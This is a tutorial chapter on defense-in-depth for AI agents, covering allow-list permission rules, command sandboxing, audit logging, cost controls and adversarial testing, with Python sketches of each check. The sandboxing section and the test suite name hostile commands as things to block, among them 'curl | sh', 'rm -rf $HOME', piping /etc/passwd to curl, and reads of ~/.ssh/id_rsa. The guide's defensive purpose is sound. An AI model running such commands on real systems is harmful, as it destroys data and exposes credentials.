Safety & Guardrails

Permissions, Sandboxing & Audit

Defense-in-Depth for AI Agents

No single safety measure is enough. A firewall without monitoring is blind. An audit log without permission rules is just a record of damage. Defense-in-depth means layering multiple protections so that no single failure can cause serious harm.

For AI agents, the layers are: permission rules, command sandboxing, audit logging, and cost controls.

Layer 1: Permission Rules

Permission rules define what the agent is allowed to do. There are two philosophies:

Approach	How It Works	Safety Level
Block-list	Allow everything except what's listed	Weak — you can't anticipate every dangerous action
Allow-list	Block everything except what's listed	Strong — agent can only do what you explicitly permit

Always use allow-lists. With a block-list, you have to think of every possible dangerous command. With an allow-list, the agent can only do what you've explicitly approved.
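To make the difference concrete, here is a small sketch in which both policies answer the same question: may the agent run this command? The two command sets are hypothetical examples, not values from any real configuration.

```python
# Two hypothetical policies answering the same question: may the agent run this command?
BLOCK_LIST = {"rm", "curl", "chmod"}             # deny these, allow everything else
ALLOW_LIST = {"ls", "cat", "mkdir", "cp", "mv"}  # permit these, deny everything else


def block_list_permits(command: str) -> bool:
    """Block-list: anything not explicitly forbidden is allowed."""
    return command not in BLOCK_LIST


def allow_list_permits(command: str) -> bool:
    """Allow-list: anything not explicitly permitted is denied."""
    return command in ALLOW_LIST


# Dangerous commands the block-list author never thought to list.
for command in ["/bin/rm", "wget", "dd", "python3"]:
    print(f"{command}: block-list={block_list_permits(command)}, allow-list={allow_list_permits(command)}")
```

Every command in the loop slips through the block-list (`/bin/rm` is the same program as `rm`, just spelled differently), while the allow-list refuses all of them without anyone having predicted them.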

Your safety-rules.json uses an allow-list approach:

Allowed directories are explicitly listed

Allowed commands are explicitly listed

Everything else is denied by default
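A minimal sketch of how a default-deny check might read such a file. The key names `allowed_directories` and `allowed_commands`, the example paths, and the helper functions are assumptions for illustration; match them to whatever your own safety-rules.json actually contains.

```python
import json
from pathlib import Path

# Hypothetical contents; the key names in your safety-rules.json may differ.
EXAMPLE_RULES = """
{
  "allowed_directories": ["/home/agent/workspace"],
  "allowed_commands": ["ls", "cat", "mkdir", "cp", "mv"]
}
"""


def load_rules(text: str) -> dict:
    """Parse the rules JSON; a missing key becomes an empty (deny-all) list."""
    raw = json.loads(text)
    return {
        "dirs": [Path(d).resolve() for d in raw.get("allowed_directories", [])],
        "commands": set(raw.get("allowed_commands", [])),
    }


def is_path_allowed(rules: dict, path: str) -> bool:
    """True only if the path resolves inside an explicitly listed directory."""
    target = Path(path).resolve()  # collapses ".." and follows symlinks before comparing
    # Path.is_relative_to needs Python 3.9+; it compares whole path components,
    # so /home/agent/workspace-evil does not count as inside /home/agent/workspace.
    return any(target.is_relative_to(d) for d in rules["dirs"])


def is_command_allowed(rules: dict, command: str) -> bool:
    """True only for commands named in the list; everything else is denied."""
    return command in rules["commands"]
```

With a real file you would call `load_rules(Path("safety-rules.json").read_text())`. Both checks start from "no" and only return True on an explicit match, so a directory or command you forgot to list is refused rather than silently permitted.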

Layer 2: Command Sandboxing

Even with permission rules, shell commands deserve extra scrutiny. An agent with shell access can:

Delete files (rm -rf)

Change permissions (chmod 777)

Download and execute code (curl | sh)

Exfiltrate data (curl -X POST with your files as payload)

Command sandboxing restricts *which* shell commands the agent can run and *how*:

Command allow-list — only ls, cat, mkdir, cp, mv (no rm, curl, chmod)

Argument validation — even allowed commands can be dangerous with wrong arguments (cp to a system directory)

No pipe chains — prevent cat /etc/passwd | curl ...

No shell expansion: prevent rm -rf $HOME, where your check sees the literal text $HOME but the shell replaces it with a real path after the check has passed
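Here is one way to sketch those four checks in Python. The allow-list, the sandbox root `/home/agent/workspace`, and the set of forbidden characters are illustrative assumptions, not values taken from safety-rules.json, and `validate_command`/`run_sandboxed` are hypothetical helper names.

```python
import os
import shlex
import subprocess

# Hypothetical values for illustration; take the real ones from your own rules.
ALLOWED_COMMANDS = {"ls", "cat", "mkdir", "cp", "mv"}
SANDBOX_ROOT = "/home/agent/workspace"

# Characters that chain commands, redirect I/O, or trigger shell expansion.
FORBIDDEN_CHARS = set("|;&$`<>*?~(){}\n")


def validate_command(command_line: str) -> list[str]:
    """Return the argument list if every check passes; otherwise raise ValueError."""
    # No pipe chains and no shell expansion: refuse the metacharacters outright.
    bad = FORBIDDEN_CHARS.intersection(command_line)
    if bad:
        raise ValueError(f"forbidden shell characters: {''.join(sorted(bad))}")

    # Command allow-list: the first word must be explicitly permitted.
    args = shlex.split(command_line)  # also raises ValueError on unbalanced quotes
    if not args or args[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"command not allowed: {command_line!r}")

    # Argument validation: every non-flag argument must resolve inside the sandbox root.
    root = os.path.realpath(SANDBOX_ROOT)
    for arg in args[1:]:
        if arg.startswith("-"):
            continue  # flags are skipped here; a stricter version would allow-list them too
        resolved = os.path.realpath(os.path.join(root, arg))
        if os.path.commonpath([root, resolved]) != root:
            raise ValueError(f"argument escapes the sandbox: {arg!r}")
    return args


def run_sandboxed(command_line: str) -> subprocess.CompletedProcess:
    """Run a validated command with shell=False, so no shell ever parses the string."""
    args = validate_command(command_line)
    return subprocess.run(
        args, cwd=SANDBOX_ROOT, shell=False, capture_output=True, text=True, timeout=10
    )
```

The decisive choice is `shell=False`: the argument list goes straight to the program, so even if a `|` or `$HOME` slipped past validation, no shell would interpret it. The character check is deliberately blunt and will reject some harmless filenames, which is an acceptable trade-off for a default-deny layer.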

Layer 3: Audit Logging

Every action the agent takes must be logged. The audit log serves three purposes:

Forensics — what happened, when, and why (after something goes wrong)

Monitoring — real-time visibility into what the agent is doing (detect problems early)

Accountability — proof that the agent followed its safety rules (or didn't)

A good audit log entry includes:

Field	Purpose
`timestamp`	When the action occurred
`action`	What the agent did (e.g., "file_move", "api_call")
`category`	Action type (read, write, delete, network, shell)
`target`	What was acted on (file path, URL, command)
`result`	Success, failure, or denied
`reasoning`	Why the agent chose this action
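One simple way to store entries like these is JSON Lines (one JSON object per line), which is easy to append to and easy to search. The sketch below assumes a local log file and uses exactly the fields from the table; `AuditEntry` and `log_action` are hypothetical names.

```python
import json
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone

VALID_CATEGORIES = {"read", "write", "delete", "network", "shell"}
VALID_RESULTS = {"success", "failure", "denied"}


@dataclass
class AuditEntry:
    action: str     # what the agent did, e.g. "file_move" or "api_call"
    category: str   # read, write, delete, network, or shell
    target: str     # file path, URL, or command acted on
    result: str     # success, failure, or denied
    reasoning: str  # why the agent chose this action
    timestamp: str = field(
        default_factory=lambda: datetime.now(timezone.utc).isoformat()
    )


def log_action(log_path: str, entry: AuditEntry) -> None:
    """Append one entry as a single JSON line; denied attempts go through the same path."""
    if entry.category not in VALID_CATEGORIES or entry.result not in VALID_RESULTS:
        raise ValueError(f"malformed audit entry: {entry}")
    with open(log_path, "a", encoding="utf-8") as f:
        f.write(json.dumps(asdict(entry)) + "\n")
```

A denied shell call would be recorded as `log_action("audit.jsonl", AuditEntry("shell_exec", "shell", "curl ... | sh", "denied", "agent wanted to install a dependency"))`. Timestamps are stored in UTC so entries from different machines sort correctly.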

Review your audit logs regularly. An agent that reads ~/.ssh/id_rsa on every run is a red flag even if it's technically allowed.
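A regular review does not have to be elaborate. This sketch assumes the JSON Lines format with `action`, `target`, and `result` fields; `review_log` is a hypothetical helper, and the list of sensitive markers is only a starting point, not a complete inventory.

```python
import json
from collections import Counter

# Hypothetical markers for targets worth a second look even when access is allowed.
SENSITIVE_MARKERS = (".ssh/", "id_rsa", ".aws/credentials", ".env")


def review_log(lines: list[str]) -> tuple[Counter, Counter]:
    """Count touches of sensitive targets and denied attempts per action."""
    sensitive: Counter = Counter()
    denied: Counter = Counter()
    for line in lines:
        if not line.strip():
            continue  # tolerate blank lines
        entry = json.loads(line)
        target = entry.get("target", "")
        if any(marker in target for marker in SENSITIVE_MARKERS):
            sensitive[target] += 1
        if entry.get("result") == "denied":
            denied[entry.get("action", "unknown")] += 1
    return sensitive, denied
```

Reading the log with `review_log(open("audit.jsonl", encoding="utf-8").readlines())` and printing `sensitive.most_common(5)` is enough to spot an agent that opens `~/.ssh/id_rsa` on every run. A sudden rise in denied attempts is just as informative.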

Layer 4: Cost Controls

API-based agents spend money on every request. Without cost controls:

A loop bug can send thousands of API calls in minutes

A verbose agent can use 10x more tokens than necessary

A multi-step workflow can chain expensive calls

Cost controls to implement:

Per-request limit — max tokens per single API call

Per-run limit — total budget for one agent task execution

Per-day limit — hard cap on daily spending

Alert thresholds — notifications at 50%, 80%, and 95% of limits
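The four controls fit naturally into one guard object. This sketch assumes you can estimate a call's cost before sending it and learn the actual cost afterwards (for example, from the token counts your API returns multiplied by your provider's prices). `CostGuard`, `BudgetExceeded`, and all limits are hypothetical.

```python
from dataclasses import dataclass, field


class BudgetExceeded(Exception):
    """Raised when a call would break a hard limit; the call should not be made."""


@dataclass
class CostGuard:
    per_request_tokens: int   # max tokens for a single API call
    per_run_usd: float        # total budget for one task execution
    per_day_usd: float        # hard cap on daily spending
    thresholds: tuple = (0.5, 0.8, 0.95)
    run_spent: float = 0.0
    day_spent: float = 0.0
    alerted: set = field(default_factory=set)

    def start_run(self) -> None:
        """Reset per-run counters; daily totals carry over (midnight reset not shown)."""
        self.run_spent = 0.0
        self.alerted = {key for key in self.alerted if key[0] != "run"}

    def authorize(self, max_tokens: int, est_cost_usd: float) -> None:
        """Check a call before it is sent, using an estimated cost."""
        if max_tokens > self.per_request_tokens:
            raise BudgetExceeded(f"{max_tokens} tokens exceeds the per-request limit")
        if self.run_spent + est_cost_usd > self.per_run_usd:
            raise BudgetExceeded("per-run budget would be exceeded")
        if self.day_spent + est_cost_usd > self.per_day_usd:
            raise BudgetExceeded("daily budget would be exceeded")

    def record(self, actual_cost_usd: float) -> list[str]:
        """Charge the real cost after a call and return any newly crossed alert levels."""
        self.run_spent += actual_cost_usd
        self.day_spent += actual_cost_usd
        alerts = []
        for scope, spent, limit in (
            ("run", self.run_spent, self.per_run_usd),
            ("day", self.day_spent, self.per_day_usd),
        ):
            for level in self.thresholds:
                if spent >= level * limit and (scope, level) not in self.alerted:
                    self.alerted.add((scope, level))  # alert once per level
                    alerts.append(f"{scope} budget at {level:.0%}")
        return alerts
```

The split between `authorize` (before the call) and `record` (after it) matters: a hard cap is only useful if it stops the next request, because the money for a completed request is already spent. The returned alert strings are left for the caller to route to email, chat, or a dashboard.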

Testing Your Guardrails

The most important step: try to break your own safety system. Adversarial testing means:

Try to access a blocked directory — does the agent refuse?

Try to run a blocked command — does the permission check catch it?

Try to exceed cost limits — does the budget cap trigger?

Check the audit log — are all attempts (including denied ones) recorded?
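The checks above can be turned into a repeatable test suite. To keep the sketch self-contained it uses a toy `guarded_execute` function as a stand-in; in practice you would import your real permission check and audit logger instead. All names, paths, and attack strings are hypothetical, and the plain `assert` style means the same cases can be moved into a pytest file. Cost caps can be tested the same way by feeding the guard calls until it refuses.

```python
import json

# Stand-in guard for illustration; replace with your real permission check and logger.
ALLOWED_COMMANDS = {"ls", "cat", "mkdir", "cp", "mv"}
ALLOWED_DIR = "/home/agent/workspace/"
audit_log: list[str] = []


def guarded_execute(command: str, path: str) -> str:
    """Decide whether to allow the action, log the decision, and return the result."""
    allowed = command in ALLOWED_COMMANDS and path.startswith(ALLOWED_DIR) and ".." not in path
    result = "success" if allowed else "denied"
    audit_log.append(json.dumps({"action": command, "target": path, "result": result}))
    return result


# Attempts a confused or manipulated agent might make.
ATTACKS = [
    ("cat", "/home/agent/.ssh/id_rsa"),               # blocked directory
    ("cat", "/home/agent/workspace/../.ssh/id_rsa"),  # path traversal
    ("rm", "/home/agent/workspace/data"),             # blocked command
    ("curl", "http://example.com/payload.sh"),        # network download
]


def run_adversarial_suite() -> None:
    for command, path in ATTACKS:
        before = len(audit_log)
        assert guarded_execute(command, path) == "denied", f"guard allowed {command} {path}"
        # Every attempt, including denied ones, must leave exactly one audit record.
        assert len(audit_log) == before + 1, "attempt was not logged"
        assert json.loads(audit_log[-1])["result"] == "denied"
    print(f"all {len(ATTACKS)} attacks denied and logged")
```

Running a suite like this before every deploy, and whenever the rules change, turns "the agent should refuse" into something you have checked; an attack that starts passing is a regression in your guardrails.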

If you can break your guardrails, so can a confused LLM. Fix the gap before it matters.

Key Takeaways

Defense-in-depth: layer permission rules, sandboxing, audit logging, and cost controls.

Always use allow-lists over block-lists — you can't anticipate every dangerous action.

Log every action, including denied attempts. Review logs regularly for anomalies.

Cost controls prevent runaway API spending from loops and verbose agents.

Test your guardrails adversarially — try to break them before deploying.

This is chapter 3 of Open Source AI Agents (OpenClaw).
